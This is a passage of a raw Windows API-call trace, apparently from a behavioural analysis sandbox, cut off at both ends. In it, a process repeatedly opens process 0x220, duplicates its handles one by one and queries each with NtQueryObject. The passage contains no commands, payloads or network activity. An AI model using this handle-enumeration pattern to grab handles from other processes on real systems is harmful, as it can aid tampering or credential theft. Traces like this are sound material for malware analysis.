hSourceHandle=0x3e4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.411] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.412] CloseHandle (hObject=0x1b8) returned 1 [0113.412] CloseHandle (hObject=0x198) returned 1 [0113.412] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.412] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x3e8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.412] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.412] CloseHandle (hObject=0x1b8) returned 1 [0113.412] CloseHandle (hObject=0x198) returned 1 [0113.412] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.412] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x3ec, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.413] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.413] CloseHandle (hObject=0x1b8) returned 1 [0113.413] CloseHandle (hObject=0x198) returned 1 [0113.413] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.413] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x3f0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.413] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.414] CloseHandle (hObject=0x1b8) returned 1 [0113.414] CloseHandle (hObject=0x198) returned 1 [0113.414] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.414] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x3f4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.414] CloseHandle (hObject=0x198) returned 1 [0113.414] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.414] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x3f8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.414] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.415] CloseHandle (hObject=0x1b8) returned 1 [0113.415] CloseHandle (hObject=0x198) returned 1 [0113.415] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.415] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x3fc, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.415] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.415] CloseHandle (hObject=0x1b8) returned 1 [0113.415] CloseHandle (hObject=0x198) returned 1 [0113.415] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.415] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x404, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.416] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.416] CloseHandle (hObject=0x1b8) returned 1 [0113.416] CloseHandle (hObject=0x198) returned 1 [0113.416] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.416] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x408, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.416] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.416] CloseHandle (hObject=0x1b8) returned 1 [0113.417] CloseHandle (hObject=0x198) returned 1 [0113.417] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.417] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x40c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.417] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.417] CloseHandle (hObject=0x1b8) returned 1 [0113.417] CloseHandle (hObject=0x198) returned 1 [0113.417] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.417] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x410, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.417] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.418] CloseHandle (hObject=0x1b8) returned 1 [0113.418] CloseHandle (hObject=0x198) returned 1 [0113.418] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.418] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x414, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.418] CloseHandle (hObject=0x198) returned 1 [0113.418] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.418] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x418, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.418] CloseHandle (hObject=0x198) returned 1 [0113.419] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.419] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x41c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.419] CloseHandle (hObject=0x198) returned 1 [0113.419] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.419] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x420, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.419] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.419] CloseHandle (hObject=0x1b8) returned 1 [0113.419] CloseHandle (hObject=0x198) returned 1 [0113.419] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.420] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x424, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.420] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.420] CloseHandle (hObject=0x1b8) returned 1 [0113.420] CloseHandle (hObject=0x198) returned 1 [0113.420] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.420] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x428, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.420] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.420] CloseHandle (hObject=0x1b8) returned 1 [0113.421] CloseHandle (hObject=0x198) returned 1 [0113.421] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.421] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x42c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.421] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.421] CloseHandle (hObject=0x1b8) returned 1 [0113.421] CloseHandle (hObject=0x198) returned 1 [0113.421] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.421] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x430, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.421] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.422] CloseHandle (hObject=0x1b8) returned 1 [0113.422] CloseHandle (hObject=0x198) returned 1 [0113.422] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.422] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x434, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.423] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.423] CloseHandle (hObject=0x1b8) returned 1 [0113.423] CloseHandle (hObject=0x198) returned 1 [0113.423] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.423] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x438, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.423] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.424] CloseHandle (hObject=0x1b8) returned 1 [0113.424] CloseHandle (hObject=0x198) returned 1 [0113.424] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.424] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x43c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.424] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.424] CloseHandle (hObject=0x1b8) returned 1 [0113.424] CloseHandle (hObject=0x198) returned 1 [0113.424] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.425] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x440, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.425] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.425] CloseHandle (hObject=0x1b8) returned 1 [0113.425] CloseHandle (hObject=0x198) returned 1 [0113.425] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.425] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x444, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.425] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.426] CloseHandle (hObject=0x1b8) returned 1 [0113.426] CloseHandle (hObject=0x198) returned 1 [0113.426] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.426] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x448, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.426] CloseHandle (hObject=0x198) returned 1 [0113.426] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.426] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x44c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.427] CloseHandle (hObject=0x198) returned 1 [0113.427] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.427] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x450, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.427] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.427] CloseHandle (hObject=0x1b8) returned 1 [0113.427] CloseHandle (hObject=0x198) returned 1 [0113.427] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.427] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x454, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.427] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.428] CloseHandle (hObject=0x1b8) returned 1 [0113.428] CloseHandle (hObject=0x198) returned 1 [0113.428] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.428] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x458, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.428] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.428] CloseHandle (hObject=0x1b8) returned 1 [0113.428] CloseHandle (hObject=0x198) returned 1 [0113.428] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.428] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x45c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.429] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.429] CloseHandle (hObject=0x1b8) returned 1 [0113.429] CloseHandle (hObject=0x198) returned 1 [0113.429] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.429] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x460, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.429] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.430] CloseHandle (hObject=0x1b8) returned 1 [0113.430] CloseHandle (hObject=0x198) returned 1 [0113.430] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.430] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x464, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.430] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.430] CloseHandle (hObject=0x1b8) returned 1 [0113.430] CloseHandle (hObject=0x198) returned 1 [0113.430] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.430] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x468, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.431] CloseHandle (hObject=0x198) returned 1 [0113.431] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.431] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x46c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.431] CloseHandle (hObject=0x198) returned 1 [0113.431] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.431] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x470, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.431] CloseHandle (hObject=0x198) returned 1 [0113.431] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.432] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x474, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.432] CloseHandle (hObject=0x198) returned 1 [0113.432] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.432] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x478, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.432] CloseHandle (hObject=0x198) returned 1 [0113.432] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.432] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x47c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.433] CloseHandle (hObject=0x198) returned 1 [0113.433] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.433] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x480, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.433] CloseHandle (hObject=0x198) returned 1 [0113.433] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.433] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x484, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.433] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.433] CloseHandle (hObject=0x1b8) returned 1 [0113.434] CloseHandle (hObject=0x198) returned 1 [0113.434] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.434] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x488, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.434] CloseHandle (hObject=0x198) returned 1 [0113.434] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.434] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x48c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.434] CloseHandle (hObject=0x198) returned 1 [0113.435] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.435] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x490, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.435] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.435] CloseHandle (hObject=0x1b8) returned 1 [0113.435] CloseHandle (hObject=0x198) returned 1 [0113.435] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.435] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x494, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.435] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.436] CloseHandle (hObject=0x1b8) returned 1 [0113.436] CloseHandle (hObject=0x198) returned 1 [0113.436] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.436] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x498, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.436] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.436] CloseHandle (hObject=0x1b8) returned 1 [0113.436] CloseHandle (hObject=0x198) returned 1 [0113.437] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.437] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x49c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.437] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.437] CloseHandle (hObject=0x1b8) returned 1 [0113.437] CloseHandle (hObject=0x198) returned 1 [0113.437] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.437] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x4a0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, 